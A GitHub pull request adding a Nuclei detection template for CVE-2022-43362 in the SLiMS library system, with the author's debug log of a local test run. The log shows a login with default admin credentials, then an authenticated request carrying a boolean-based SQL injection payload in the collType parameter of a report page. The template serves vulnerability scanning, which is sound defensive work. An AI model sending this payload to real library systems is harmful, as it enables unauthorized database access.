Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add CVE-2022-43362.yaml #11569

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

Add CVE-2022-43362.yaml #11569

wants to merge 1 commit into from
+69 −0

Conversation

nblirwn
Copy link
Contributor

@nblirwn nblirwn commented Feb 2, 2025

Template / PR Information

Template Validation

I've validated this template locally?

  • YES
  • NO

Debug

$ nuclei -t CVE-2022-43362.yaml -u http://localhost:8089 -var username=admin -var password=admin --debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.7

                projectdiscovery.io

[INF] Current nuclei version: v3.3.7 (outdated)
[INF] Current nuclei-templates version: v10.1.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 52
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2022-43362] Dumped HTTP request for http://localhost:8089/bulian/index.php?p=login

GET /bulian/index.php?p=login HTTP/1.1
Host: localhost:8089
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2022-43362] Dumped HTTP response http://localhost:8089/bulian/index.php?p=login

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Feb 2025 14:46:42 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.41 (Win64) PHP/7.4.16
Set-Cookie: SenayanMember=ctc0q73m5pf337930qvs8lj7mg; expires=Mon, 03-Feb-2025 02:46:42 GMT; Max-Age=43200; path=/bulian/; HttpOnly
X-Powered-By: PHP/7.4.16

<!--
# ===============================
# Classic SLiMS Template
# ===============================
# @Author: Waris Agung Widodo
# @Email:  [email protected]
# @Date:   2018-01-23T11:25:57+07:00
# @Last modified by:   Waris Agung Widodo
# @Last modified time: 2019-01-03T11:25:57+07:00
-->
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Library Automation Login | Senayan</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <meta http-equiv="Pragma" content="no-cache"/>
    <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, post-check=0, pre-check=0"/>
    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>
    <meta name="robots" content="noindex, follow">        <meta name="description" content="Library Automation Login | Senayan">
      <meta name="keywords" content="Open Source Library Management System">
      <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1">
    <meta name="generator" content="SLiMS 9 (Bulian)">
    <meta name="theme-color" content="#000">

    <meta property="og:locale" content="en_US"/>
    <meta property="og:type" content="book"/>
    <meta property="og:title" content="Library Automation Login | Senayan"/>
        <meta property="og:description" content="Open Source Library Management System"/>
      <meta property="og:url" content="//localhost%2Fbulian%2Findex.php%3Fp%3Dlogin"/>
    <meta property="og:site_name" content="Senayan"/>
        <meta property="og:image"
            content="//localhost/bulian/template/default/img/logo.png"/>

    <meta name="twitter:card" content="summary">
    <meta name="twitter:url" content="//localhost%2Fbulian%2Findex.php%3Fp%3Dlogin"/>
    <meta name="twitter:title" content="Library Automation Login | Senayan"/>
        <meta property="twitter:image"
            content="//localhost/bulian/template/default/img/logo.png"/>
      <!-- // load bootstrap style -->
    <link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css">
    <!-- // font awesome -->
    <link rel="stylesheet" href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css">
    <!-- Tailwind CSS -->
    <link rel="stylesheet" href="template/default/assets/css/tailwind.min.css">
    <!-- Vegas CSS -->
    <link rel="stylesheet" href="template/default/assets/plugin/vegas/vegas.min.css">
    <link href="/bulian/js/toastr/toastr.min.css?28094642" rel="stylesheet" type="text/css"/>
    <!-- SLiMS CSS -->
    <link rel="stylesheet" href="/bulian/js/colorbox/colorbox.css">
    <!-- // Flag css -->
    <link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css">
    <!-- // my custom style -->
    <link rel="stylesheet" href="template/default/assets/css/style.css?v=20250202-094642">

    <link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/>

    <!-- // load vue js -->
    <script src="template/default/assets/js/vue.min.js"></script>
    <!-- // load jquery library -->
    <script src="template/default/assets/js/jquery.min.js"></script>
    <!-- // load popper javascript -->
    <script src="template/default/assets/js/popper.min.js"></script>
    <!-- // load bootstrap javascript -->
    <script src="template/default/assets/js/bootstrap.min.js"></script>
    <!-- // load vegas javascript -->
    <script src="template/default/assets/plugin/vegas/vegas.min.js"></script>
    <script src="/bulian/js/toastr/toastr.min.js"></script>
    <!-- // load SLiMS javascript -->
    <script src="/bulian/js/colorbox/jquery.colorbox-min.js"></script>
    <script src="/bulian/js/gui.js"></script>
    <script src="/bulian/js/fancywebsocket.js"></script>

</head>
<body class="bg-grey-lightest">

<div class="result-search pb-5">
    <section id="section1 container-fluid">
        <header class="c-header">
            <div class="mask"></div>

<nav class="navbar navbar-expand-lg navbar-dark bg-transparent">
    <a class="navbar-brand inline-flex items-center" href="index.php">
                <svg
            class="fill-current text-white inline-block h-8 w-8"
            version="1.1"
            xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
            viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"
            xml:space="preserve">
                <path d="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1
                l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2
                c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4
                C118.4,98.6,118.3,98.5,118.3,98.3z M114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6
                L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0
                c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8z M95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/>
         </svg>
                <div class="inline-flex flex-col leading-tight ml-2">
            <h1 class="text-lg m-0 p-0">Senayan</h1>
                    </div>
    </a>
    <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
        <span class="navbar-toggler-icon"></span>
    </button>

    <div class="collapse navbar-collapse" id="navbarSupportedContent">
        <ul class="navbar-nav ml-auto">
          <li class="nav-item ">
    <a class="nav-link" href="index.php">Home</a>
</li><li class="nav-item ">
    <a class="nav-link" href="index.php?p=libinfo">Information</a>
</li><li class="nav-item ">
    <a class="nav-link" href="index.php?p=news">News</a>
</li><li class="nav-item ">
    <a class="nav-link" href="index.php?p=help">Help</a>
</li><li class="nav-item ">
    <a class="nav-link" href="index.php?p=librarian">Librarian</a>
</li>                        <li class="nav-item ">
                  <a class="nav-link" href="index.php?p=member">Member Area</a>
              </li>
                      <li class="nav-item dropdown">
                              <a class="nav-link dropdown-toggle cursor-pointer" type="button" id="languageMenuButton"
                   data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                    <span class="flag-icon flag-icon-us" style="border-radius: 2px;"></span>
                </a>
                <div class="dropdown-menu bg-grey-lighter dropdown-menu-lg-right" aria-labelledby="dropdownMenuButton">
                    <h6 class="dropdown-header">Select Language : </h6>
                      <a class="dropdown-item" href="index.php?select_lang=ar_SA">
        <span class="flag-icon flag-icon-sa mr-2" style="border-radius: 2px;"></span> Arabic
    </a>    <a class="dropdown-item" href="index.php?select_lang=bn_BD">
        <span class="flag-icon flag-icon-bd mr-2" style="border-radius: 2px;"></span> Bengali
    </a>    <a class="dropdown-item" href="index.php?select_lang=pt_BR">
        <span class="flag-icon flag-icon-br mr-2" style="border-radius: 2px;"></span> Brazilian Portuguese
    </a>    <a class="dropdown-item" href="index.php?select_lang=en_US">
        <span class="flag-icon flag-icon-us mr-2" style="border-radius: 2px;"></span> English
    </a>    <a class="dropdown-item" href="index.php?select_lang=es_ES">
        <span class="flag-icon flag-icon-es mr-2" style="border-radius: 2px;"></span> Espanol
    </a>    <a class="dropdown-item" href="index.php?select_lang=de_DE">
        <span class="flag-icon flag-icon-de mr-2" style="border-radius: 2px;"></span> German
    </a>    <a class="dropdown-item" href="index.php?select_lang=id_ID">
        <span class="flag-icon flag-icon-id mr-2" style="border-radius: 2px;"></span> Indonesian
    </a>    <a class="dropdown-item" href="index.php?select_lang=ja_JP">
        <span class="flag-icon flag-icon-jp mr-2" style="border-radius: 2px;"></span> Japanese
    </a>    <a class="dropdown-item" href="index.php?select_lang=my_MY">
        <span class="flag-icon flag-icon-my mr-2" style="border-radius: 2px;"></span> Malay
    </a>    <a class="dropdown-item" href="index.php?select_lang=fa_IR">
        <span class="flag-icon flag-icon-ir mr-2" style="border-radius: 2px;"></span> Persian
    </a>    <a class="dropdown-item" href="index.php?select_lang=ru_RU">
        <span class="flag-icon flag-icon-ru mr-2" style="border-radius: 2px;"></span> Russian
    </a>    <a class="dropdown-item" href="index.php?select_lang=th_TH">
        <span class="flag-icon flag-icon-th mr-2" style="border-radius: 2px;"></span> Thai
    </a>    <a class="dropdown-item" href="index.php?select_lang=tr_TR">
        <span class="flag-icon flag-icon-tr mr-2" style="border-radius: 2px;"></span> Turkish
    </a>    <a class="dropdown-item" href="index.php?select_lang=ur_PK">
        <span class="flag-icon flag-icon-pk mr-2" style="border-radius: 2px;"></span> Urdu
    </a>                </div>
            </li>
        </ul>
    </div>
</nav>
        </header>
      <div class="search" id="search-wraper" xmlns:v-bind="http://www.w3.org/1999/xhtml">
    <div class="container">
        <div class="row">
            <div class="col-lg-8 mx-auto">
                <div class="card border-0 shadow">
                    <div class="card-body">
                        <form class="" action="index.php" method="get" @submit.prevent="searchSubmit">
                            <input type="hidden" name="search" value="search">
                            <input ref="keywords" value="" v-model.trim="keywords"
                                   @focus="searchOnFocus" @blur="searchOnBlur" type="text" id="search-input"
                                   name="keywords" class="input-transparent w-100" autocomplete="off"
                                   placeholder="Enter keyword to search collection..."/>
                        </form>
                    </div>
                </div>
                <transition name="slide-fade">
                    <div v-if="show" class="advanced-wraper shadow mt-4" id="advanced-wraper"
                         v-click-outside="hideSearch">
                        <p class="label mb-2">
                            Search by :                            <i @click="hideSearch"
                               class="far fa-times-circle float-right text-danger cursor-pointer"></i>
                        </p>
                        <div class="d-flex flex-wrap">
                            <a v-bind:class="{'btn-primary text-white': searchBy === 'keywords', 'btn-outline-secondary': searchBy !== 'keywords' }"
                               @click="searchOnClick('keywords')" class="btn mr-2 mb-2">ALL</a>
                            <a v-bind:class="{'btn-primary text-white': searchBy === 'author', 'btn-outline-secondary': searchBy !== 'author' }"
                               @click="searchOnClick('author')" class="btn mr-2 mb-2">Author</a>
                            <a v-bind:class="{'btn-primary text-white': searchBy === 'subject', 'btn-outline-secondary': searchBy !== 'subject' }"
                               @click="searchOnClick('subject')" class="btn mr-2 mb-2">Subject</a>
                            <a v-bind:class="{'btn-primary text-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy !== 'isbn' }"
                               @click="searchOnClick('isbn')" class="btn mr-2 mb-2">ISBN/ISSN</a>
                            <button class="btn btn-light mr-2 mb-2" disabled>OR TRY</button>
                            <a class="btn btn-outline-primary mr-2 mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a>
                        </div>
                        <p v-if="lastKeywords.length > 0" class="label mt-4">Last search:</p>
                        <a :href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`"
                           class="flex items-center justify-between py-1 text-decoration-none text-grey-darkest hover:text-blue"
                           v-for="k in lastKeywords" :key="k"><span><i
                                        class="far fa-clock text-grey-dark mr-2"></i><span class="italic text-sm">{{tmpObj[k].text}}</span></span><i
                                    class="fas fa-angle-right text-grey-dark"></i></a>
                    </div>
                </transition>
            </div>
        </div>
    </div>
</div>
    </section>

    <section class="container mt-8">
      <h2 class="mb-4">Library Automation Login | Senayan</h2><hr><div id="loginForm">
    <noscript>
        <div style="font-weight: bold; color: #FF0000;">Your browser does not support Javascript or Javascript is disabled. Application won't run without Javascript!<div>
    </noscript>
    <form action="index.php?p=login" method="post">
            <div class="heading1">Username</div>
        <div class="login_input"><input type="text" name="userName" id="userName" class="login_input" required /></div>
        <div class="heading1">Password</div>
        <div class="login_input"><input type="password" name="passWord" class="login_input" autocomplete="off" required /></div>
        <input type="hidden" name="_csrf_token_645a83a41868941e4692aa31e7235f2" value="8d9b8cb7f522738a7b45cd09ffd707aaa6c03071"/>        <!-- Captcha in form - start -->
                <!-- Captcha in form - end -->

        <div class="marginTop">
        <div class="remember_forgot">
            <div class="remember">
                                <input type="checkbox" id="remember_me" name="remember" value="1">
                <label for="remember_me">Remember me</label>
                            </div>
        </div>
        <input type="submit" name="logMeIn" value="Login" class="loginButton" />
        <input type="button" value="Home" class="homeButton" onclick="javascript: location.href = 'index.php';" />
        <a class="forgotButton" href="index.php?p=forgot">Forgot my password</a>
        </div>
        </form>
</div>
<script type="text/javascript">jQuery('#userName').focus();</script>

    </section>
</div>


<footer class="py-4 bg-grey-darkest text-grey-lighter">
    <div class="container">
        <div class="row py-4">
            <div class="col-md-3">
                                <svg
                          class="fill-current text-grey-lighter block h-12 w-12 mb-2"
                          version="1.1"
                          xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
                          viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"
                          xml:space="preserve">
                    <path d="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1
                    l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2
                    c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4
                    C118.4,98.6,118.3,98.5,118.3,98.3z M114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6
                    L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0
                    c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8z M95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/>
                </svg>
                              <div class="mb-4">Senayan</div>
                <ul class="list-reset">
                    <li><a class="text-light" href="index.php?p=libinfo">Information</a></li>
                    <li><a class="text-light" href="index.php?p=services">Services</a></li>
                    <li><a class="text-light" href="index.php?p=librarian">Librarian</a></li>
                    <li><a class="text-light" href="index.php?p=member">Member Area</a></li>
                </ul>
            </div>
            <div class="col-md-5 pt-8 md:pt-0">
                <h4 class="mb-4">About Us</h4>
                <p>
                    <p>As a complete Library Management System, SLiMS (Senayan Library Management System) has many features that will help libraries and librarians to do their job easily
and quickly. Follow <a target="_blank" href="https://slims.web.id/web/pages/about/">this link</a> to show some features provided by SLiMS.</p>                </p>
            </div>
            <div class="col-md-4 pt-8 md:pt-0">
                <h4 class="mb-4">Search</h4>
                <div class="mb-2">start it by typing one or more keywords for title, author or subject</div>
                <form action="index.php">
                    <div class="input-group mb-3">
                        <input name="keywords" type="text" class="form-control"
                               placeholder="Enter keywords"
                               aria-label="Enter keywords"
                               aria-describedby="button-addon2">
                        <div class="input-group-append">
                            <button class="btn btn-primary" type="submit" value="search" name="search"
                                    id="button-addon2">Find Collection                            </button>
                        </div>
                    </div>
                </form>
                <hr>
                <a target="_blank" title="Support Us" class="btn btn-outline-success mb-2"
                   href="https://slims.web.id/web/pages/support-us/"><i
                            class="fas fa-heart mr-2"></i>Keep SLiMS Alive</a>
                <a target="_blank" title="Contribute" class="btn btn-outline-light mb-2"
                   href="https://github.com/slims/"><i
                            class="fab fa-github mr-2"></i>Want to Contribute?</a>
            </div>
        </div>
        <hr>
        <div class="flex font-thin text-sm">
            <p class="flex-1">&copy; 2025 &mdash; Senayan Developer Community</p>
            <div class="flex-1 text-right text-grey">Powered by <code>SLiMS</code></div>
        </div>
    </div>
</footer>



<!-- // Load modal -->

<div class="modal fade" id="exampleModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel"
     aria-hidden="true">
    <div class="modal-dialog modal-lg" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <h5 class="modal-title" id="exampleModalLabel">Select the topic you are interested in</h5>
                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">&times;</span>
                </button>
            </div>
            <div class="modal-body">
                <ul class="topic d-flex flex-wrap justify-content-center p-0">
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=0&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/0-chemical.png" width="80" class="mb-3 mx-auto"/>
                            Computer Science, Information & General Works                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=1&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/1-memory.png" width="80" class="mb-3 mx-auto"/>
                            Philosophy & Psychology                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=2&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/2-mosque.png" width="80" class="mb-3 mx-auto"/>
                            Religion                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=3&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/3-diploma.png" width="80" class="mb-3 mx-auto"/>
                            Social Sciences                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=4&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/4-translation.png" width="80" class="mb-3 mx-auto"/>
                            Language                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=5&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/5-math.png" width="80" class="mb-3 mx-auto"/>
                            Pure Science                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=6&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/6-blackboard.png" width="80" class="mb-3 mx-auto"/>
                            Applied Sciences                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=7&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/7-quill.png" width="80" class="mb-3 mx-auto"/>
                            Art & Recreation                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=8&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/8-books.png" width="80" class="mb-3 mx-auto"/>
                            Literature                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=9&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/9-return-to-the-past.png" width="80" class="mb-3 mx-auto"/>
                            History & Geography                        </a>
                    </li>
                </ul>
            </div>
            <div class="modal-footer text-muted text-sm">
                <div>Icons made by <a href="http://www.freepik.com" title="Freepik">Freepik</a> from <a href="https://www.flaticon.com/" title="Flaticon">www.flaticon.com</a></div>
            </div>
        </div>
    </div>
</div>

<div class="modal fade" id="adv-modal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel"
     aria-hidden="true">
    <div class="modal-dialog modal-lg" role="document">
        <form class="modal-content" action="index.php" method="get">
            <div class="modal-header">
                <h5 class="modal-title" id="exampleModalLabel">Advanced Search</h5>
                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">&times;</span>
                </button>
            </div>
            <div class="modal-body">
                <div class="row">
                    <div class="col">
                        <div class="form-group">
                            <label for="adv-titles">Title</label>
                            <input type="text" name="title" class="form-control" id="adv-titles"
                                   placeholder="Enter title">
                        </div>
                    </div>
                    <div class="col">
                        <div class="form-group">
                            <label for="adv-author">Author(s)</label>
                            <input type="text" name="author" class="form-control" id="adv-author"
                                   placeholder="Enter author(s) name">
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col">
                        <div class="form-group">
                            <label for="adv-subject">Subject(s)</label>
                            <input type="text" name="subject" class="form-control" id="adv-subject"
                                   placeholder="Enter subject">
                        </div>
                    </div>
                    <div class="col">
                        <div class="form-group">
                            <label for="adv-isbn">ISBN/ISSN</label>
                            <input type="text" name="isbn" class="form-control" id="adv-isbn"
                                   placeholder="Enter ISBN/ISSN">
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col">
                        <div class="form-group">
                            <label for="adv-coll-type">Collection Type</label>
                            <select name="colltype" class="form-control"
                                    id="adv-coll-type"><option value="0">All Collections</option><option value="Fiction">Fiction</option><option value="Reference">Reference</option><option value="Textbook">Textbook</option></select>
                        </div>
                    </div>
                    <div class="col">
                        <div class="form-group">
                            <label for="adv-location">Location</label>
                            <select id="adv-location" name="location"
                                    class="form-control"> <option value="0">All Locations</option><option value="My Library">My Library</option></select>
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col">
                        <div class="form-group">
                            <label for="adv-gmd">GMD</label>
                            <select id="adv-gmd" name="gmd" class="form-control"><option value="0">All GMD/Media</option><option value="Art Original">Art Original</option><option value="Cartographic Material">Cartographic Material</option><option value="CD-ROM">CD-ROM</option><option value="Chart">Chart</option><option value="Computer File">Computer File</option><option value="Computer Software">Computer Software</option><option value="Digital Versatile Disc">Digital Versatile Disc</option><option value="Diorama">Diorama</option><option value="Electronic Resource">Electronic Resource</option><option value="Equipment">Equipment</option><option value="Filmstrip">Filmstrip</option><option value="Flash Card">Flash Card</option><option value="Game">Game</option><option value="Globe">Globe</option><option value="Kit">Kit</option><option value="Manuscript">Manuscript</option><option value="Map">Map</option><option value="Microform">Microform</option><option value="Microscope Slide">Microscope Slide</option><option value="Model">Model</option><option value="Motion Picture">Motion Picture</option><option value="Multimedia">Multimedia</option><option value="Music">Music</option><option value="Picture">Picture</option><option value="Realia">Realia</option><option value="Slide">Slide</option><option value="Sound Recording">Sound Recording</option><option value="Technical Drawing">Technical Drawing</option><option value="Text">Text</option><option value="Transparency">Transparency</option><option value="Video Recording">Video Recording</option></select>
                        </div>
                    </div>
                    <div class="col"></div>
                </div>
            </div>
            <div class="modal-footer">
                <button type="submit" name="search" value="search" class="btn btn-primary">Find Collection</button>
            </div>
        </form>
    </div>
</div>

<!-- // Load highlight -->
<script src="/bulian/js/highlight.js"></script>

<!-- // load our vue app.js -->
<script src="template/default/assets/js/app.js?v=20250202-094642"></script>
<script src="template/default/assets/js/app_jquery.js?v=20250202-094642"></script>

<script>
  $('.c-header, .vegas-slide').vegas({
        delay: 5000,
        timer: false,
        transition: 'blur',
        animation: 'none',
        slides: [
            { src: "template/default/assets/images/slide1.jpg" },
            { src: "template/default/assets/images/slide2.jpg" },
            { src: "template/default/assets/images/slide3.jpg" },
            { src: "template/default/assets/images/slide4.jpg" }
        ]
    });
</script>
</body>
</html>
[INF] [CVE-2022-43362] Dumped HTTP request for http://localhost:8089/bulian/index.php?p=login

POST /bulian/index.php?p=login HTTP/1.1
Host: localhost:8089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Connection: close
Content-Length: 128
Content-Type: application/x-www-form-urlencoded
Cookie: SenayanMember=ctc0q73m5pf337930qvs8lj7mg
Accept-Encoding: gzip

userName=admin&passWord=admin&_csrf_token_645a83a41868941e4692aa31e7235f2=8d9b8cb7f522738a7b45cd09ffd707aaa6c03071&logMeIn=Login
[DBG] [CVE-2022-43362] Dumped HTTP response http://localhost:8089/bulian/index.php?p=login

HTTP/1.1 200 OK
Connection: close
Content-Length: 82
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Feb 2025 14:46:42 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.41 (Win64) PHP/7.4.16
Set-Cookie: SenayanMember=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/bulian/
Set-Cookie: SenayanAdmin=9chli4o7c6ai4sp5of2doce0kv; expires=Mon, 03-Feb-2025 14:46:42 GMT; Max-Age=86400; path=/bulian/admin/; HttpOnly
Set-Cookie: SenayanAdmin=7sta0e20mjebti36aho0gti7q6; expires=Mon, 03-Feb-2025 14:46:42 GMT; Max-Age=86400; path=/bulian/admin/; HttpOnly
Set-Cookie: admin_logged_in=1; expires=Sun, 02-Feb-2025 18:46:42 GMT; Max-Age=14400; path=/bulian/
X-Powered-By: PHP/7.4.16

<script type="text/javascript">location.href = '/bulian/admin/index.php';</script>
[INF] [CVE-2022-43362] Dumped HTTP request for http://localhost:8089/bulian/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb&membershipType=a&collType=aaaa%27%20AND%203045=(SELECT%20(CASE%20WHEN%20(3045=3045)%20THEN%203045%20ELSE%20(SELECT%203726%20UNION%20SELECT%205145)%20END))--%20-

GET /bulian/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb&membershipType=a&collType=aaaa%27%20AND%203045=(SELECT%20(CASE%20WHEN%20(3045=3045)%20THEN%203045%20ELSE%20(SELECT%203726%20UNION%20SELECT%205145)%20END))--%20- HTTP/1.1
Host: localhost:8089
User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Connection: close
Cookie: SenayanAdmin=7sta0e20mjebti36aho0gti7q6; admin_logged_in=1
Accept-Encoding: gzip

[DBG] [CVE-2022-43362] Dumped HTTP response http://localhost:8089/bulian/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb&membershipType=a&collType=aaaa%27%20AND%203045=(SELECT%20(CASE%20WHEN%20(3045=3045)%20THEN%203045%20ELSE%20(SELECT%203726%20UNION%20SELECT%205145)%20END))--%20-

HTTP/1.1 200 OK
Connection: close
Content-Length: 3623
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Feb 2025 14:46:42 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.41 (Win64) PHP/7.4.16
X-Powered-By: PHP/7.4.16

<!doctype html>
<html>
<head><title>Loan Report by Class Report</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <meta http-equiv="Pragma" content="no-cache"/>
    <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, post-check=0, pre-check=0"/>
    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>
    <link rel="stylesheet" type="text/css" href="/bulian/css/bootstrap.min.css"/>
    <link rel="stylesheet" type="text/css" href="/bulian/admin/admin_template/default/style.css?28094642"/>
    <script type="text/javascript" src="/bulian/js/jquery.js"></script>
    <script type="text/javascript" src="/bulian/js/gui.js"></script>
</head>
<body>
<div id="pageContent">
  <div class="mb-2">Loan Recap By Class <strong>bbbb</strong> for year <strong>2002</strong> <a class="s-btn btn btn-default printReport" onclick="window.print()" href="#">Print Current Page</a><a href="../xlsoutput.php" class="s-btn btn btn-default" target="_BLANK">Export to spreadsheet format</a>
    <a class="s-btn btn btn-info notAJAX openPopUp" href="/bulian/admin/modules/reporting/pop_chart.php" width="700" height="530" title="Loan Recap By Class">Show in chart/plot</a></div>
